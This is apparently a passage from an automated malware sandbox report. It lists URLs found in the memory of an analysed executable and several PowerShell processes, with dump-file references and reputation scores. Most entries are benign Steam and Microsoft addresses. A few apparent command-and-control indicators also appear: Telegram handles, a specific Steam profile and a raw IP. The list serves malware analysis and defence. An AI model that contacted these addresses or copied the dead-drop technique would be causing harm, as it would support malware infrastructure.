0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                  high
                                                                  https://nuget.org/nuget.exepowershell.exe, 00000004.00000002.2023765180.00000000056EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2172468220.000000000626C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://help.steampe770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://s.ytimg.com;e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameYYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002CD1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2031133778.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2021300435.0000000004681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2188708233.0000000004BE7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2362908303.0000000004678000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004A51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDe770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                            high
                                                                            https://t.me/m3wm0wle770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://steam.tv/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://37.27.43.9876561199804377619[1].htm0.15.drfalse
                                                                                  unknown
                                                                                  https://steamcommunity.com/login/home/?goto=profiles%2F7656119980437761976561199804377619[1].htm0.15.drfalse
                                                                                    high
                                                                                    https://t.me/m3wm0w8e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000004.00000002.2021300435.00000000047D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2162024820.0000000005356000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2327299767.00000000051A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://steamcommunity.com/profiles/76561199804377619C:e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://store.steampowered.com/privacy_agreement/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                high
                                                                                                https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=_92Te770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                  high
                                                                                                  http://store.ste770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://contoso.com/Iconpowershell.exe, 0000000E.00000002.2343555484.0000000005ABA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://store.steampowered.com/points/shop/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                        high
                                                                                                        https://steamcommunity.com/profiles/76561199804377619.com/profiles/76561199804377619e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          https://steamcommunity.com/ce770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://sketchfab.come770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              https://lv.queniujq.cne770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://www.youtube.com/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007E9000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://github.com/Pester/Pesterpowershell.exe, 0000000E.00000002.2327299767.0000000004BA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://store.steampowered.com/privacy_agreement/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                      high
                                                                                                                      https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=EZbG2DEumYDH&amp;l=englie770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                        high
                                                                                                                        https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851438166.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530407452.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079B000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&amp;l=englie770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                            high
                                                                                                                            https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pnge770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711935110.000000000078D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3712443998.0000000000940000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261240295.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218084012.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3261165449.00000000007FB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2871408769.0000000000799000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3237393314.00000000007EB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2530291579.00000000007DB000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000002.3711520151.0000000000493000.00000004.00000001.01000000.00000008.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2851502828.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895160094.00000000007E4000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.3218121656.000000000079D000.00000004.00000020.00020000.00000000.sdmp, e770bfb4-8ae3-4ca0-9689-b46bbe460ffc.exe, 0000000F.00000003.2895215988.000000000079C000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.15.dr, 76561199804377619[1].htm0.15.drfalse
                                                                                                                              high
                                                                                                                              http://crl.micropowershell.exe, 0000000E.00000002.2326236200.0000000002C6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://raw.githubusercontent.comYYjRtxS70h.exe, 00000000.00000002.3415219385.0000000002D96000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
